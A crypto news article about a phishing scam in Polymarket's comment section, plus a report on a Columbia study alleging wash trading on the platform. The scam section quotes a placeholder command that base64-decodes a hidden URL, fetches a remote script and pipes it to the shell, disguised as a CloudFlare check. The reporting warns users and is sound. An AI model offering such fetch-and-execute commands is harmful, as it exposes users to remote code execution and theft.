Polymarket is in the headlines again, this time because one of its senior traders with the moniker “25usdc,” sounded the alarm over a scheme that uses the platform’s comment section to prey on unsuspecting users.
This is happening at a crucial time for the Polymarket platform as it is getting ready to re-enter the U.S. market and is struggling to get ahead of rivals like Kalshi.
Screenshot of a typical message of a hacker redirecting Polymarket users to click on phishing links. Source: @25usdc via X/Twitter.Polymarket traders on high alert
According to 25usdc, hackers have been using the Polymarket comment section to run a scam, and so far, users have lost over $500,000.
“They say: ‘Why are you not trading on Polymarket private markets? The odds are always much better on there!’” 25usdc wrote, before explaining how the whole scam works.
According to him, it all starts with them buying both Yes and No shares for a market from two separate accounts. This way, their comments are still there even when the “Holders” filter is enabled. After that, they post a URL to their site in an obfuscated form.
The URL takes the unsuspecting user to a clean-looking page with a Polymarket logo and requests users’ login via email. Once the email is verified, a new window pops up asking the user to verify their activity, imitating CloudFlare.
However 25usdc says when you click “Copy”, a command that looks something like this “curl -kfsSL $(echo ‘ENCODED_STRING==’|base64 -d)|zsh” is copied instead and the first thing it does, if the user makes the mistake of pasting it into their terminal, is decode the base64-encoded string (a server URL), after which it fetches a script from that server and immediately executes it.
The script in question can contain anything, and there will reportedly be no pop-up warning, at which point the damage has been done, and the only remedy according to 25usdc, might be turning off the Wi-Fi.
“In the end, they gather data, log everything on your system, and send a zip back to their server,” 25usdc wrote. “They then use this data to log into your accounts and steal your money.”
Other things he noticed were how carefully the group operates; for example, they cover their trails by switching wallets often, obfuscate at every step of the way, and even shut down the server that sends payloads and receives logged data when there is no active victim.
“I think the best way to address this is to allow trusted users to review comments or to introduce a downvote system that hides heavily downvoted posts,” 25usdc concluded while pointing out that the simple warning Polymarket currently displays won’t be enough.
New study claims Polymarket’s volume is propped up by wash trading
As Cryptopolitan reported, a recently published study by Columbia University researchers claims the volume of activity on Polymarket has been significantly inflated by wash trading.
The “artificial trading,” as the authors termed it, varied over time, but they say it accounted for an average of 25% of all buying and selling on Polymarket over the past three years.
The paper has not undergone peer review but is already up on the open-access research platform SSRN and is being reviewed by Polymarket.
To be clear, the authors do not outrightly accuse Polymarket itself for the wash trading. However, they have highlighted elements of the exchange’s crypto-based structure that make the claim plausible.
They have also suggested that the company’s customers may have independently engaged in said wash trading in an attempt to improve their chances of gaining access to a proprietary digital token that the company’s founder, Shayne Coplan, has hinted at the possibility of launching as recently as October 8th.
“I’m hopeful that Polymarket will welcome the analysis in our paper,” Yash Kanoria, a professor at Columbia University’s business school, and one of the paper’s four co-authors, said in an email. “Wash trading doesn’t add liquidity or information to the market, so it would seem valuable to distinguish authentic from inauthentic volume.”
If some of Polymarket’s volume is truly “fictitious,” the study claims it could alter the understanding of Polymarket’s relative strength in the industry and also undermine the current notion that prediction markets reflect the “wisdom of a larger crowd.”
“The potential for large-scale wash trading means that volume may be unreliable as a metric of authentic platform activity, especially in cryptocurrency-based exchanges which may not have proper safeguards,” the authors concluded.
The smartest crypto minds already read our newsletter. Want in? Join them.
Source: https://www.cryptopolitan.com/phishing-links-in-polymarket-private-markets/
